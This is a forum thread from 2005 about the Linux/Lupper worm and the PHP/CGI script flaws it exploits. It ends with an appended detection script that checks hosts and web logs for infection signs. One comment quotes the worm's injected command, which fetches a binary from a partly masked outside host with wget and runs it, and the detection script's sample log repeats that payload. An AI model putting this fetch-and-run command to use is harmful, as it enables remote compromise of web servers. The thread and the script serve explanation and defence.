Friday, December 09, 2005

Linux Lupper.Worm In the Wild

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm, which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious HTTP requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."

335 comments. Selected comments follow; collapsed replies below the display threshold are omitted.

CONTINUE: (Score:5, Funny) by xtracto on Tuesday November 08, @09:51AM (#13978478)

Next is a collection of messages telling that it is the fault of the system administrators and not a problem of the Linux distributions.

p.s. BURN KARMA BURN!

Only partially. (Score:4, Insightful) by khasim on Tuesday November 08, @11:16AM (#13979197)

Let's look at this logically.

If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.

If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.

If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.

So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance. Both can be made vulnerable by installing systems/scripts that are not part of the default system.

But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.

The "proof" of which has "better" "security" will be how widespread this worm is compared to Slammer or Code Red or Nimda.

Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.

Remarkably Useless page. (Score:5, Interesting) by Short Circuit on Tuesday November 08, @09:52AM (#13978479)

First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.

Second, how do you remove it? Quoth the page:

> Removal Instructions
> AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.
> Additional Windows ME/XP removal considerations

Re:Remarkably Useless page. (Score:4, Informative) by TheSpoom on Tuesday November 08, @09:54AM (#13978500)

It doesn't say what software it tries to exploit, but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.

I'd say if your website has one of those scripts, I'd look into updating or removing whatever software it is that has the vulnerability.

Re:Remarkably Useless page. (Score:5, Insightful) by tomhudson on Tuesday November 08, @09:59AM (#13978552)

More alarmist shit (and old news at that - The Reg reported this last week).

Some PHP scripts that have as much to do with Linux as a vulnerability in, say, Photoshop, has to do with XP.

The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" version from Microsoft, and BSD/OSX/Linux users don't need an anti-virus).

Re:Remarkably Useless page. (Score:4, Informative) by harlows_monkeys on Tuesday November 08, @10:53AM (#13979012)

> More alarmist shit (and old news at that - The Reg reported this last week)

My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses. This indicates that this is indeed in the wild, and active, and spreading.

Thus, it is not alarmist shit.

Re:Remarkably Useless page. (Score:4, Insightful) by tomhudson on Tuesday November 08, @11:06AM (#13979115)

The key word is "attempts".

Hey, look through your logs - you'll also see Slapper in there, and Code Red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?

The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.

Now:
If you haven't updated your machine in years
If you have those particular scripts installed
If you allow files in /tmp to be run by processes from user "nobody"
... that's a LOT of ifs ...

In other words, nothing to see here but more antivirus vendor FUD.

Re:Remarkably Useless page. (Score:5, Funny) by tomhudson on Tuesday November 08, @11:10AM (#13979161)

I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/

Knock yourselves out :-)

Re:Remarkably Useless page. (Score:5, Funny) by Macrobat on Tuesday November 08, @02:08PM (#13980930)

You know, if you link to a porn site, you could at least warn us.

Re:Remarkably Useless page. (Score:5, Informative) by gowen on Tuesday November 08, @09:55AM (#13978513)

According to ZDNet/Symantec [zdnet.com]:

> The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.
> The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services.

Other links (Score:4, Informative) by AndroidCat on Tuesday November 08, @10:04AM (#13978599)

Security Focus [securityfocus.com], eWeek [eweek.com], CNet [com.com]

It's not Windows (Score:5, Informative) by max born on Tuesday November 08, @10:19AM (#13978735)

From the Security Focus article:

> Affected systems will need to be wiped and have the OS reinstalled, in most cases.

Apache usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

Re:Remarkably Useless page. (Score:5, Insightful) by budgenator on Tuesday November 08, @03:39PM (#13981936)

Step one: go to securityfocus [securityfocus.com] and update all of the applications listed on your system.

Symptoms:
Presence of the following file:
* /tmp/lupii
One of the following ports is listening:
* UDP 7111
* UDP 7222

So running

    su -c "netstat --listening --extend --program"

tells you if it's even running, by listing what is listening on any port such as UDP 7111 or 7222. Then it would be easy to

    su -c "kill -9 pid-of-lupii"
    su -c "rm /tmp/lupii"
    su -c "touch /tmp/lupii"

The worm apparently does this:

    echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*

So unless your server has a vulnerability that allows privilege escalation from nobody, it's stuck in tmp directories or possibly in your html directories.

PHP exploit, not directly a linux problem? (Score:5, Insightful) by Anonymous Coward on Tuesday November 08, @09:52AM (#13978480)

Seems kind of wrong to name it exclusively a Linux problem.

Re:PHP exploit, not directly a linux problem? (Score:5, Informative) by mysqlrocks on Tuesday November 08, @09:58AM (#13978542)

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

Re:PHP exploit, not directly a linux problem? (Score:4, Informative) by rbochan on Tuesday November 08, @10:17AM (#13978713)

> Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

According to this article [com.com], AWStats was patched back in February.

AWStats is a PHP application? (Score:5, Informative) by smartfart on Tuesday November 08, @11:17AM (#13979207)

Um, AWStats isn't written in PHP, but in Perl [freshmeat.net]. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.

Re:How can we get some free press? (Score:5, Insightful) by jellomizer on Tuesday November 08, @09:57AM (#13978529)

Because it seems to only affect Linux and BSD systems (with a different worm). Other systems running PHP are not affected. So yes, it is a Linux worm. Like many of the Windows worms are not Windows worms, but IE or Outlook worms.

Re:How can we get some free press? (Score:5, Insightful) by sqlrob on Tuesday November 08, @10:01AM (#13978576)

IE worm = Windows worm.

Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.

if it attacks PHP cross-platform... (Score:5, Insightful) by frankie on Tuesday November 08, @09:53AM (#13978489)

...then it's a PHP/*nix worm, not Linux specifically.

Heck, there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.

Re:if it attacks PHP cross-platform... (Score:4, Informative) by alexhs on Tuesday November 08, @10:28AM (#13978793)

> ...then it's a PHP/*nix worm, not Linux specifically.

Not exactly. From what I understood, there are BSD and Linux variants: both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.

There's a layer available in BSD that allows running Linux binaries natively, so Linux potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect a Linux through Wine.

Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii?

Sadly a preview of things to come because... (Score:5, Insightful) by Assmasher on Tuesday November 08, @09:54AM (#13978498)

...Linux is more and more popular with corporations holding valuable and important data.

Success is a double-edged sword. ;)

You're wrong. (Score:5, Insightful) by khasim on Tuesday November 08, @11:56AM (#13979669)

> It will come up because it is true.

No. It will keep coming up because people who don't understand security will keep bringing it up.

There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.

The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.

> As for the worm, I didn't say it was a flaw in Linux, I was merely pointing out that security issues that affect Linux systems will rise as the success of Linux rises.

That's what you believe. Yet my bank example shows that popularity has nothing to do with security.

> Maybe you should mod that as 'master of the obvious', but it doesn't make it any less accurate.

That is because your statement is as inaccurate as possible already.

By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.

And security is why this worm will not do much damage.

http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html [symantec.com]

Look for "Number of Infections: 0-49".

Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!

What's that? "Number of Sites: 0-2"?

That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?

Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.

Complete infection (Score:5, Funny) by soren.harward on Tuesday November 08, @09:54AM (#13978505)

All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.

Conditions for infection... (Score:5, Insightful) by xutopia on Tuesday November 08, @09:56AM (#13978520)

> If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

I'm thinking this is funny as hell. How many people configure Apache this way?
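A defender-side check for the symptoms budgenator lists above (the /tmp/lupii dropper, UDP 7111/7222 listening) and for the wget/lupii payload harlows_monkeys saw in web logs, written here as an added example rather than code from the thread, McAfee or Symantec. It assumes Linux netstat output in the format shown and an Apache access log at /var/log/httpd/access_log; the sample lines are constructed and /cgi-bin/VULNERABLE_SCRIPT is a placeholder, not a real path.

```shell
#!/bin/sh
# Indicator check for Linux/Lupper built from the symptoms quoted in the
# thread. Added example, not McAfee's or Symantec's tooling.

# Constructed "netstat --listening --extend --program" output.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address   Foreign Address  State  PID/Program name
tcp        0      0 0.0.0.0:80      0.0.0.0:*        LISTEN 812/httpd
udp        0      0 0.0.0.0:7111    0.0.0.0:*               2231/lupii
udp        0      0 0.0.0.0:123     0.0.0.0:*               640/ntpd'

# Constructed Apache access-log lines. The worm host is elided exactly as
# in the thread; the script path is a placeholder, not a real target.
SAMPLE_LOG='203.0.113.7 - - [08/Nov/2005:09:51:00 +0000] "GET /index.php HTTP/1.0" 200 512
203.0.113.9 - - [08/Nov/2005:09:52:10 +0000] "GET /cgi-bin/VULNERABLE_SCRIPT?p=cd%20/tmp;wget%20xx.xx.193.244/lupii;./lupii HTTP/1.0" 404 0
203.0.113.9 - - [08/Nov/2005:09:52:11 +0000] "POST /blog/ HTTP/1.0" 404 0'

# Exit 0 when the dropper file from the McAfee symptom list exists.
lupii_file_present() {
  [ -e "${1:-/tmp/lupii}" ]
}

# Filter: keeps netstat lines for UDP sockets bound to port 7111 or 7222.
lupii_udp_listeners() {
  grep -E '^udp6?[[:space:]].*:(7111|7222)[[:space:]]'
}

# Filter: keeps access-log lines carrying the payload tokens from the
# thread ("cd /tmp", "wget", "lupii"), URL-encoded or not.
lupii_payload_requests() {
  grep -E -i 'lupii|wget(%20| )|cd(%20| )/tmp'
}

# Count helpers taking the text as an argument, so results are testable.
count_udp_listeners() {
  printf '%s\n' "$1" | lupii_udp_listeners | wc -l | tr -d ' '
}

count_payload_requests() {
  printf '%s\n' "$1" | lupii_payload_requests | wc -l | tr -d ' '
}

# Live check: run as root so netstat shows PIDs. Log path is an assumption.
lupii_report() {
  log="${1:-/var/log/httpd/access_log}"
  if lupii_file_present; then
    echo "WARNING: /tmp/lupii exists"
  fi
  n="$(netstat --listening --extend --program 2>/dev/null | lupii_udp_listeners | wc -l | tr -d ' ')"
  if [ "$n" -gt 0 ]; then
    echo "WARNING: $n UDP listener(s) on 7111/7222 (kill the PID, then remove /tmp/lupii)"
  fi
  if [ -r "$log" ]; then
    echo "payload requests in $log: $(lupii_payload_requests < "$log" | wc -l | tr -d ' ')"
  fi
}

# Demo on the constructed samples; a real run would call lupii_report.
echo "UDP listeners in sample netstat: $(count_udp_listeners "$SAMPLE_NETSTAT")"
echo "payload requests in sample log: $(count_payload_requests "$SAMPLE_LOG")"
```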
